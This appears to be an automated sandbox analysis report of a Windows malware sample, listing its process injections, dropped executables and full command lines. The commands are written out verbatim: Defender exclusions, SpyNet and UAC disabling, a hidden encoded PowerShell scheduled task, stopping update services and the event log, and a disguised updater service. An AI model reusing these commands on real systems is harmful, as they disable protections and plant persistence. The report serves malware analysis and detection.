Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 456 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 456 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 456 wrote to memory of 652 N/A C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 456 wrote to memory of 652 N/A C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 456 wrote to memory of 652 N/A C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 456 wrote to memory of 652 N/A C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 456 wrote to memory of 652 N/A C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 456 wrote to memory of 652 N/A C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 456 wrote to memory of 652 N/A C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 456 wrote to memory of 652 N/A C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 652 wrote to memory of 3652 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\IglGrnQY4KjxY4ESkNLr1P49.exe
PID 652 wrote to memory of 3652 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\IglGrnQY4KjxY4ESkNLr1P49.exe
PID 652 wrote to memory of 3652 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\IglGrnQY4KjxY4ESkNLr1P49.exe
PID 652 wrote to memory of 384 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\YcZF7SNXvFMc37DYXI3ziUaW.exe
PID 652 wrote to memory of 384 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\YcZF7SNXvFMc37DYXI3ziUaW.exe
PID 652 wrote to memory of 384 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\YcZF7SNXvFMc37DYXI3ziUaW.exe
PID 3652 wrote to memory of 2536 N/A C:\Users\Admin\Pictures\IglGrnQY4KjxY4ESkNLr1P49.exe C:\Users\Admin\AppData\Local\Temp\is-7K59T.tmp\IglGrnQY4KjxY4ESkNLr1P49.tmp
PID 3652 wrote to memory of 2536 N/A C:\Users\Admin\Pictures\IglGrnQY4KjxY4ESkNLr1P49.exe C:\Users\Admin\AppData\Local\Temp\is-7K59T.tmp\IglGrnQY4KjxY4ESkNLr1P49.tmp
PID 3652 wrote to memory of 2536 N/A C:\Users\Admin\Pictures\IglGrnQY4KjxY4ESkNLr1P49.exe C:\Users\Admin\AppData\Local\Temp\is-7K59T.tmp\IglGrnQY4KjxY4ESkNLr1P49.tmp
PID 652 wrote to memory of 5104 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\MjaQmNnsQNMq8m3PWjNhbwcJ.exe
PID 652 wrote to memory of 5104 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\MjaQmNnsQNMq8m3PWjNhbwcJ.exe
PID 652 wrote to memory of 5104 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\MjaQmNnsQNMq8m3PWjNhbwcJ.exe
PID 5104 wrote to memory of 3292 N/A C:\Users\Admin\Pictures\MjaQmNnsQNMq8m3PWjNhbwcJ.exe C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
PID 5104 wrote to memory of 3292 N/A C:\Users\Admin\Pictures\MjaQmNnsQNMq8m3PWjNhbwcJ.exe C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
PID 5104 wrote to memory of 3292 N/A C:\Users\Admin\Pictures\MjaQmNnsQNMq8m3PWjNhbwcJ.exe C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
PID 2536 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\is-7K59T.tmp\IglGrnQY4KjxY4ESkNLr1P49.tmp C:\Users\Admin\AppData\Local\Lina Text\linatext.exe
PID 2536 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\is-7K59T.tmp\IglGrnQY4KjxY4ESkNLr1P49.tmp C:\Users\Admin\AppData\Local\Lina Text\linatext.exe
PID 2536 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\is-7K59T.tmp\IglGrnQY4KjxY4ESkNLr1P49.tmp C:\Users\Admin\AppData\Local\Lina Text\linatext.exe
PID 2536 wrote to memory of 3932 N/A C:\Users\Admin\AppData\Local\Temp\is-7K59T.tmp\IglGrnQY4KjxY4ESkNLr1P49.tmp C:\Users\Admin\AppData\Local\Lina Text\linatext.exe
PID 2536 wrote to memory of 3932 N/A C:\Users\Admin\AppData\Local\Temp\is-7K59T.tmp\IglGrnQY4KjxY4ESkNLr1P49.tmp C:\Users\Admin\AppData\Local\Lina Text\linatext.exe
PID 2536 wrote to memory of 3932 N/A C:\Users\Admin\AppData\Local\Temp\is-7K59T.tmp\IglGrnQY4KjxY4ESkNLr1P49.tmp C:\Users\Admin\AppData\Local\Lina Text\linatext.exe
PID 5104 wrote to memory of 764 N/A C:\Users\Admin\Pictures\MjaQmNnsQNMq8m3PWjNhbwcJ.exe C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
PID 5104 wrote to memory of 764 N/A C:\Users\Admin\Pictures\MjaQmNnsQNMq8m3PWjNhbwcJ.exe C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
PID 5104 wrote to memory of 764 N/A C:\Users\Admin\Pictures\MjaQmNnsQNMq8m3PWjNhbwcJ.exe C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
PID 764 wrote to memory of 4316 N/A C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe C:\Windows\SysWOW64\cmd.exe
PID 764 wrote to memory of 4316 N/A C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe C:\Windows\SysWOW64\cmd.exe
PID 764 wrote to memory of 4316 N/A C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe C:\Windows\SysWOW64\cmd.exe
PID 4316 wrote to memory of 5008 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 4316 wrote to memory of 5008 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 4316 wrote to memory of 5008 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 4316 wrote to memory of 3972 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4316 wrote to memory of 3972 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4316 wrote to memory of 3972 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 652 wrote to memory of 3484 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\HaHE4yGhKaVOdJY4tH9U0wE2.exe
PID 652 wrote to memory of 3484 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\HaHE4yGhKaVOdJY4tH9U0wE2.exe
PID 652 wrote to memory of 3484 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\HaHE4yGhKaVOdJY4tH9U0wE2.exe
PID 652 wrote to memory of 1592 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\mqJpRwpbfK974CI6kSx5DDx3.exe
PID 652 wrote to memory of 1592 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\mqJpRwpbfK974CI6kSx5DDx3.exe
PID 652 wrote to memory of 2872 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\POWMHemIAdhWqbG9WwO5wEor.exe
PID 652 wrote to memory of 2872 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\POWMHemIAdhWqbG9WwO5wEor.exe
PID 652 wrote to memory of 2872 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\POWMHemIAdhWqbG9WwO5wEor.exe
PID 652 wrote to memory of 4268 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe
PID 652 wrote to memory of 4268 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe
PID 652 wrote to memory of 4268 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe
PID 4268 wrote to memory of 1720 N/A C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe
PID 4268 wrote to memory of 1720 N/A C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe
PID 4268 wrote to memory of 1720 N/A C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe
PID 4268 wrote to memory of 856 N/A C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\UzSZFMWFpthvMvdZfvnxrxs2.exe
PID 4268 wrote to memory of 856 N/A C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\UzSZFMWFpthvMvdZfvnxrxs2.exe
PID 4268 wrote to memory of 856 N/A C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\UzSZFMWFpthvMvdZfvnxrxs2.exe
PID 2872 wrote to memory of 2320 N/A C:\Users\Admin\Pictures\POWMHemIAdhWqbG9WwO5wEor.exe C:\Users\Admin\AppData\Local\Temp\7zS86E3.tmp\Install.exe
PID 2872 wrote to memory of 2320 N/A C:\Users\Admin\Pictures\POWMHemIAdhWqbG9WwO5wEor.exe C:\Users\Admin\AppData\Local\Temp\7zS86E3.tmp\Install.exe
PID 2872 wrote to memory of 2320 N/A C:\Users\Admin\Pictures\POWMHemIAdhWqbG9WwO5wEor.exe C:\Users\Admin\AppData\Local\Temp\7zS86E3.tmp\Install.exe
PID 4268 wrote to memory of 3128 N/A C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe N/A

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe

"C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"

C:\Users\Admin\Pictures\IglGrnQY4KjxY4ESkNLr1P49.exe

"C:\Users\Admin\Pictures\IglGrnQY4KjxY4ESkNLr1P49.exe"

C:\Users\Admin\Pictures\YcZF7SNXvFMc37DYXI3ziUaW.exe

"C:\Users\Admin\Pictures\YcZF7SNXvFMc37DYXI3ziUaW.exe"

C:\Users\Admin\AppData\Local\Temp\is-7K59T.tmp\IglGrnQY4KjxY4ESkNLr1P49.tmp

"C:\Users\Admin\AppData\Local\Temp\is-7K59T.tmp\IglGrnQY4KjxY4ESkNLr1P49.tmp" /SL5="$C01D8,1511216,54272,C:\Users\Admin\Pictures\IglGrnQY4KjxY4ESkNLr1P49.exe"

C:\Users\Admin\Pictures\MjaQmNnsQNMq8m3PWjNhbwcJ.exe

"C:\Users\Admin\Pictures\MjaQmNnsQNMq8m3PWjNhbwcJ.exe"

C:\Users\Admin\AppData\Local\Temp\syncUpd.exe

C:\Users\Admin\AppData\Local\Temp\syncUpd.exe

C:\Users\Admin\AppData\Local\Lina Text\linatext.exe

"C:\Users\Admin\AppData\Local\Lina Text\linatext.exe" -i

C:\Users\Admin\AppData\Local\Lina Text\linatext.exe

"C:\Users\Admin\AppData\Local\Lina Text\linatext.exe" -s

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "

C:\Windows\SysWOW64\chcp.com

chcp 1251

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F

C:\Users\Admin\Pictures\HaHE4yGhKaVOdJY4tH9U0wE2.exe

"C:\Users\Admin\Pictures\HaHE4yGhKaVOdJY4tH9U0wE2.exe"

C:\Users\Admin\Pictures\mqJpRwpbfK974CI6kSx5DDx3.exe

"C:\Users\Admin\Pictures\mqJpRwpbfK974CI6kSx5DDx3.exe"

C:\Users\Admin\Pictures\POWMHemIAdhWqbG9WwO5wEor.exe

"C:\Users\Admin\Pictures\POWMHemIAdhWqbG9WwO5wEor.exe"

C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe

"C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe" --silent --allusers=0

C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe

C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.29 --initial-client-data=0x2e8,0x2ec,0x2f0,0x2e4,0x2f4,0x6f1821f8,0x6f182204,0x6f182210

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\UzSZFMWFpthvMvdZfvnxrxs2.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\UzSZFMWFpthvMvdZfvnxrxs2.exe" --version

C:\Users\Admin\AppData\Local\Temp\7zS86E3.tmp\Install.exe

.\Install.exe

C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe

"C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=4268 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240315020143" --session-guid=400773cf-74a5-42b2-bfbf-cf7b684569cd --server-tracking-blob=MDcwYmE3NWEzZjFjNDM1NjgyOGY5NGNkZDcxNzdiNGQyOTJkNTVhNjJlYjRkM2YwODM3MGU4MTc0MzY1NTk4NDp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcxMDQ2ODA4OS4zNjIzIiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiJlZTU3OTEzOC04MGVjLTQ3NjEtYjRiMy04ZWU3YjVjMjhmY2EifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=0405000000000000

C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe

C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.29 --initial-client-data=0x2fc,0x300,0x304,0x2cc,0x308,0x6e6121f8,0x6e612204,0x6e612210

C:\Users\Admin\AppData\Local\Temp\7zS8CBF.tmp\Install.exe

.\Install.exe /QnjvBdidv "385118" /S

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gkcnbQSJR" /SC once /ST 01:09:33 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gkcnbQSJR"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"

C:\ProgramData\Google\Chrome\updater.exe

